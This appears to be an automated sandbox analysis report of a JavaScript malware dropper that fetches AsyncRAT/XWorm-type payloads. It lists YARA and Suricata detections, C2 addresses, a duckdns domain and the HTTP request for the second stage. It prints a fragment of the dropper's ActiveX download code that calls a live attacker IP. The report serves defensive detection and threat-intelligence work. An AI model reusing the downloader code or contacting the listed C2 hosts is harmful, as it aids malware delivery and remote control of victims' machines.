              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

              Software Vulnerabilities

              barindex
              JavaScript source code contains functionality to generate code involving a shell, file or stream
              Source: ORDER-24930-067548.jsArgument value : ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "http://192.210.215.11/zo']Go to definition
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4x nop then jmp 07CB4676h5_2_07CB44E0
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4x nop then inc dword ptr [ebp-30h]5_2_07CB6538
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4x nop then inc dword ptr [ebp-30h]5_2_07CB3BD0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 194.37.97.150:6980 -> 192.168.2.8:49705
              Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.8:49705 -> 194.37.97.150:6980
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 194.37.97.150:6980 -> 192.168.2.8:49705
              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49705 -> 194.37.97.150:6980
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49705 -> 194.37.97.150:6980
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 192.210.215.11 80Jump to behavior
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: as525795.duckdns.org
              Source: Malware configuration extractorURLs: 194.37.97.150
              JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
              Source: ORDER-24930-067548.jsArgument value : ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "http://192.210.215.11/zo']Go to definition
              Source: global trafficTCP traffic: 192.168.2.8:49705 -> 194.37.97.150:6980
              Source: Joe Sandbox ViewIP Address: 192.210.215.11 192.210.215.11
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: Joe Sandbox ViewASN Name: AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT
              Source: global trafficHTTP traffic detected: GET /zoom/cc.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.215.11Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: global trafficHTTP traffic detected: GET /zoom/cc.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.215.11Connection: Keep-Alive
              Source: wscript.exe, 00000000.00000003.1467024468.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1475994870.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1465964784.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466406423.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466341285.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.11/zoom/cc.j
              Source: wscript.exe, 00000000.00000003.1466341285.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466568496.000002BDDF071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1463316845.000002BDE17D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.11/zoom/cc.js
              Source: wscript.exe, 00000000.00000002.1473794151.000002BDDF0C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466505372.000002BDDF0C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.11/zoom/cc.jst
              Source: GeUT.exe, 00000015.00000002.1819069957.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: GeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: GeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
              Source: places.raw.5.drString found in binary or memory: https://support.mozilla.org
              Source: places.raw.5.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: places.raw.5.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org
              Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
              Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
              Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: tmp5F14.tmp.dat.5.dr, places.raw.5.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_0082617C NtUnmapViewOfSection,25_2_0082617C
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_00828000 NtUnmapViewOfSection,25_2_00828000
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4_2_02A90D334_2_02A90D33
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_012327965_2_01232796
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_0123F4605_2_0123F460
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_012313B85_2_012313B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_05D86AF85_2_05D86AF8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_05D879CB5_2_05D879CB
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_06CA43605_2_06CA4360
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_06CA4C305_2_06CA4C30
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_06CACD885_2_06CACD88
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_06CA88B85_2_06CA88B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_06CA3C185_2_06CA3C18
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07A3B8F85_2_07A3B8F8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07A3E0705_2_07A3E070
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07A3D7705_2_07A3D770
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07A3BE885_2_07A3BE88
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CB07785_2_07CB0778
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CB564F5_2_07CB564F
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CB6AB85_2_07CB6AB8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CB07685_2_07CB0768
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CB65385_2_07CB6538
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CB1C105_2_07CB1C10
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CB3BD05_2_07CB3BD0
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CB6AA85_2_07CB6AA8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CBF9A85_2_07CBF9A8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CFEBBB5_2_07CFEBBB
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CF2B5B5_2_07CF2B5B
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CF9D395_2_07CF9D39
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CF04485_2_07CF0448
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CF03CD5_2_07CF03CD
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CF63295_2_07CF6329
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CFD6005_2_07CFD600
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CFD5F15_2_07CFD5F1
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CF458B5_2_07CF458B
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CFCCDF5_2_07CFCCDF
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CF70705_2_07CF7070
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07D10BB85_2_07D10BB8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 7_2_05180D327_2_05180D32
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 7_2_051864507_2_05186450
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 7_2_051843D07_2_051843D0
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 7_2_051852087_2_05185208
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 7_2_051872887_2_05187288
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 7_2_051872797_2_05187279
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 8_2_031213B88_2_031213B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 9_2_010713B89_2_010713B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 10_2_02C613B810_2_02C613B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 12_2_00F313B812_2_00F313B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 13_2_02D8728813_2_02D87288
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 13_2_02D8520813_2_02D85208
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 13_2_02D843D013_2_02D843D0
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 13_2_02D8645013_2_02D86450
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 13_2_02D80D3213_2_02D80D32
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 13_2_02D8728413_2_02D87284
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 13_2_02D8727913_2_02D87279
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 13_2_02D8727C13_2_02D8727C
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 14_2_026913C314_2_026913C3
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 15_2_00C113B815_2_00C113B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 17_2_00BC13B817_2_00BC13B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 19_2_00C5728819_2_00C57288
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 19_2_00C5521319_2_00C55213
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 19_2_00C543D019_2_00C543D0
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 19_2_00C5645019_2_00C56450
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 19_2_00C50D3319_2_00C50D33
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 19_2_00C5727C19_2_00C5727C
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 20_2_021313B820_2_021313B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 21_2_00B613B821_2_00B613B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 22_2_027B13C322_2_027B13C3
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 23_2_00A713B823_2_00A713B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 24_2_012F13B824_2_012F13B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_0082728825_2_00827288
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_0082521225_2_00825212
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_008243D025_2_008243D0
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_0082645025_2_00826450
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_00820D3225_2_00820D32
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_008261C825_2_008261C8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_0082727925_2_00827279
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 26_2_021613B826_2_021613B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 27_2_00F613B827_2_00F613B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 29_2_016913ED29_2_016913ED
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 30_2_025713B830_2_025713B8
              Source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
